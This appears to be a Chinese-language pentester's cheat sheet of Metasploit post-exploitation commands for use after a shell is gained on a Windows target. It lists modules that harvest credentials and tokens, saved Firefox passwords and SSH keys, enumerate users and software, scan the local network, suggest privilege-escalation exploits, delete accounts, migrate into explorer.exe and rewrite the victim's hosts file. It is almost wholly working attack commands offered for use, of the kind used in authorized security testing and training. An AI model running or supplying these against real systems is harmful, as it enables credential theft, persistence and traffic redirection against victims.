post 模块 取得shell之后使用的模块
set exitonsession false
获得shell之后继续侦听
通过jobs查看后台的shell
run post/windows/gather/arp_scanner RHOSTS=2.1.1.0/24 扫描网段
run post/windows/gather/checkvm 检查是不是虚拟机
run post/windows/gather/credentials/credential_collector 收集Token
run post/windows/gather/enum_applications 枚举安装的软件
run post/windows/gather/enum_logged_on_users 查看当前登录的id
run post/windows/gather/enum_snmp 枚举snmp
run post/multi/recon/local_exploit_suggester 侦查有哪些本地提权漏洞
run post/windows/manage/delete_user USERNAME=yuanfh
删除用户,但用户不会被自动注销
run post/multi/gather/env
获取目标详细信息
run post/multi/gather/firefox_creds
把火狐浏览器里保存的用户和密码
run post/multi/gather/ssh_creds
提取保存的ssh的密码密文,登录的证书
run post/multi/gather/check_malware
REMOTEFILE=c:\\a.exe
检查指定文件是不是恶意软件
自动执行脚本参数
最优先的那个
set InitialAutoRunScript migrate -n explorer.exe
自动运行post模块
获取最近打开的文件,前提要先迁移到目标用户帐号的进程
set AutoRunScript post/windows/gather/dumplinks
两个可以指定的位置
编辑目标的hosts文件
set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com